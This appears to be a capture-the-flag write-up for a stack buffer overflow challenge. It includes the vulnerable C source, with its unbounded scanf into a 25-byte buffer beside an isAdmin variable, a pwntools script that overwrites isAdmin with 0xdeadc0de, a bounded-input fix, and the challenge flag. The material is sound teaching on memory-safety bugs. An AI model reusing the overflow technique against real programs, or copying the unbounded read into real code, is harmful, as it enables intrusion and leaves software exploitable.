AUCHALL - [Pwn] - cancel
Challenge Description
I'm not sure what this does, but it seems to be vulnerable to something.
Solution
The first thing to check is the binary's protections.
Only NX is enabled, which means we cannot execute our own shellcode.
PIE is disabled.
On checking the source code, I found that we need to change isAdmin to
0xdeadc0de.
Source Code
#include <stdio.h>
#include <stdlib.h>   /* exit() */

/* Prints the flag; only reachable when isAdmin == 0xdeadc0de. */
void win(void) {
    FILE *file;
    char line[100];

    file = fopen("/flag", "r");
    if (file == NULL) {
        puts("[FAIL] Contact an admin.\n");
        exit(1);
    }
    while (fgets(line, sizeof(line), file) != NULL) {
        puts(line);
    }
    fclose(file);
}

void vuln() {
    int isAdmin = 0;
    char buffer[25];
    char _admin;

    fflush(stdout);
    printf("Hi, are you an admin? (y/n)? ");
    fflush(stdout);
    scanf("%c", &_admin);
    if (_admin == 'y') {
        printf("Ok, you are an admin. What's the password? ");
        fflush(stdout);
        /* The bug: %s has no field width, so input longer than
           buffer keeps writing past it and into isAdmin. */
        scanf("%s", buffer);
        if (isAdmin == 0xdeadc0de) {
            win();
        } else {
            printf("Sorry, you are not an admin.\n");
        }
    } else {
        printf("Ok, you are not an admin.\n");
    }
}

int main() {
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);
    vuln();
}
isAdmin sits at offset 25 from the start of buffer, so whatever follows 25 bytes of input lands in isAdmin.
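The corrected form of the unbounded read in vuln(), as an added example that is not part of the original writeup or the challenge source. The names read_password, feed and struct frame are hypothetical, the struct only mirrors the buffer-then-isAdmin layout described above, and the input bytes are constructed.

```c
#include <stdio.h>
#include <string.h>

#define BUF_LEN 25

/* Hypothetical stand-in for vuln()'s locals: isAdmin directly follows the
 * buffer, so any write past the buffer would land in it. */
struct frame { char buffer[BUF_LEN]; int isAdmin; };

/* Bounded replacement for scanf("%s", buffer). Stores at most cap-1 bytes.
 * Returns 0 if the line fit, -1 on EOF or an over-long line (the rest of
 * the line is drained and the buffer cleared). */
int read_password(FILE *in, char *buf, size_t cap) {
    if (cap == 0 || fgets(buf, (int)cap, in) == NULL)
        return -1;
    size_t n = strcspn(buf, "\n");
    if (buf[n] == '\n') { buf[n] = '\0'; return 0; }
    int c = fgetc(in);                    /* what follows the stored bytes? */
    if (c == '\n' || c == EOF) return 0;  /* line ended exactly at the limit */
    while (c != '\n' && c != EOF) c = fgetc(in);
    buf[0] = '\0';
    return -1;
}

/* Feed constructed input through a temp file; returns read_password's
 * result, or -2 if the temp file could not be created. */
int feed(const void *data, size_t len, struct frame *f) {
    FILE *tmp = tmpfile();
    if (tmp == NULL) return -2;
    fwrite(data, 1, len, tmp);
    rewind(tmp);
    int rc = read_password(tmp, f->buffer, sizeof f->buffer);
    fclose(tmp);
    return rc;
}

int main(void) {
    /* Constructed input: 25 filler bytes, then the bytes of 0xdeadc0de. */
    unsigned char payload[34];
    memset(payload, 'A', 25);
    memcpy(payload + 25, "\xde\xc0\xad\xde\0\0\0\0\n", 9);
    struct frame f = { "", 0 };
    int rc = feed(payload, sizeof payload, &f);
    printf("rc=%d isAdmin=%#x\n", rc, (unsigned)f.isAdmin);
    return 0;
}
```

A field width on the original call, scanf("%24s", buffer), also bounds the write; the fgets version additionally reports and discards the over-long line.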
Solution
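I made a simple pwntools script to get this working:

from pwn import *

# PORT is left as in the writeup; set it to the challenge instance's port
io = remote('section-b.cy243l.ooguy.com', PORT)
print(io.recv())      # admin (y/n) prompt
io.sendline(b'y')
print(io.recv())      # password prompt
# 25 bytes of padding, then the value that overwrites isAdmin
payload = cyclic(25) + p64(0xdeadc0de)
io.sendline(payload)
print(io.recv())
io.interactive()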
Flag
Flag is dynamic
CY243L{0v3rwr1t1ng_th3se_varsss_CCdEFbA_Z5Ue_Jkei}
Writeups 2023 © RootxRAN.